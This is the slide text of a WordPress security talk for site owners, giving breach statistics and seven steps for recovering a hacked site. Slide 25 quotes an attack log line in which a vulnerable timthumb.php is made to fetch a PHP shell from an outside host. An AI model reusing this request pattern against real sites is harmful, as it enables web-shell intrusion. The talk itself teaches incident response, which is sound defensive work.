This is the presentation which I used during the awesome "WPSession #11: Security for Site Owners". I shared important information about how site owners should react to website attacks. I talked about risk management, assets evaluation and getting help from the right people that know WordPress and care about security.
5. IN 2013, 61 % OF REPORTED
ATTACKS TARGETED
SMALL AND MEDIUM
BUSINESSES, UP FROM 50%
IN 2012
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
6. 77% OF LEGITIMATE WEBSITES
HAD EXPLOITABLE
VULNERABILITIES. 1-IN-8 HAD
A CRITICAL VULNERABILITY.
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
7. MEGA BREACHES: RESULTING
IN PERSONAL DETAILS OF
OVER 10 MILLION IDENTITIES
EXPOSED IN AN INDIVIDUAL
INCIDENT.
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
8. THERE WERE EIGHT IN 2013,
COMPARED WITH ONLY ONE
IN 2012!
+ 700 %
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
9. ATTAKS PER DAY
2010 2012 2013
570,000
464,000
190,000
Source: Symantec Internet Security Threat Report 2014; Volume 19, Published April 2014
14. IDENTIFY
WHO CAN HELP YOU
• The support team of your web host
• Plugin and theme developers
• Third party companies
• Security specialists
15. THE SUPPORT TEAM
OF YOUR WEB HOST
• Website diagnostics
• Website backups and restores
• Log analysis
• WordPress core/plugin/theme upgrades
• Regular Security Audits
• Malware notifications and malicious code cleaning
18. 7 ”EASY” STEPS
1. DON’T PANIC!
2. Create a copy of the hacked site + all logs
3. Quarantine your site
4. Remove the malicious code
5. Check the archived logs for the source of the attack
6. Resolve the security issues that caused the problem
7. “Unquarantine” your site
19. 1. BACKUP YOUR
HACKED SITE
1. mysqldump -uU -pP DB > yoursitefolder/DB.sql
2. tar zcvf backup.tar.gz yoursitefolder
How to backup:
Why to do this:
This is needed, so that you can later find out
the source of the attack/vulnerability!
20. USEFUL LOGS
(on a cPanel server)
• /var/log/messages - FTP log for PureFTPd
• /usr/local/apache/domlogs/DOMAIN.COM -
Apache access log
• /var/log/exim_mainlog - Exim mail server
log
• /usr/local/cpanel/logs/access_log - cPanel
File Manager log
• /var/log/secure - SSH connections log
21. 2. QUARANTINE YOUR SITE
+ CHANGE PASSWORDS
1. Protect your users and visitors
2. Disallow Google to access your hacked
site
3. Keep hackers away during the cleaning of
the site
22. USE .HTACESS MAGIC
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REMOTE_ADDR} !^123.56.89.12
RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
RewriteCond %{SCRIPT_FILENAME} !maintenance.html
RewriteRule ^.*$ /maintenance.html [R=503,L]
ErrorDocument 503 /maintenance.html
Header Set RetryAfter "14400"
Header Set CacheControl "maxage=0, nostore"
</IfModule>
23. 3. REMOVE THE
MALICIOUS CODE
1. Restore the site from a clean backup
OR
2. Clean the affected files/database tables
24. 4. ARCHIVED
LOGS ANALYSIS
• Is complicated
• Is time consuming
• Requires advanced HTTP knowledge
• Should be performed by security specialists
25. EXAMPLE - THE
TIMTHUMB HACK
189.100.29.167 - [12/Apr/2014:06:53:41 +1000] “GET /
wpcontent/themes/premiumtheme/timthumb.php?
src=http://www.blogger.com.ex l.ro/max/wp-mails.php
HTTP/1.1ʹ′ʹ′ 301 – “-” “Mozilla/4.0 (compatible; MSIE
6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]”
189.100.29.167 - IP of the attacker.
premiumtheme/timthumb.php - Vulnerable script.
wp-mails.php - PHP shell script.
26. 5. RESOLVE THE
SECURITY ISSUES
• Upgrade WP core, plugins and themes
• Upgrade server software if needed
• Patch your code and use WAF in case there
are no upgrades available
27. 6. UNQUARANTINE YOUR
SITE + CHANGE PASSWORDS
• Remove the maintenance page
• Inform users about the breach if needed
• Keep an eye on your files/DB
28. CONCLUSION
• Web security is complicated!
• Rely on partners to recover your site.
• Be ready to manage the whole process.
• Know your assets.
• Make sure you have good security awareness.
• Security is a journey - NOT a destination!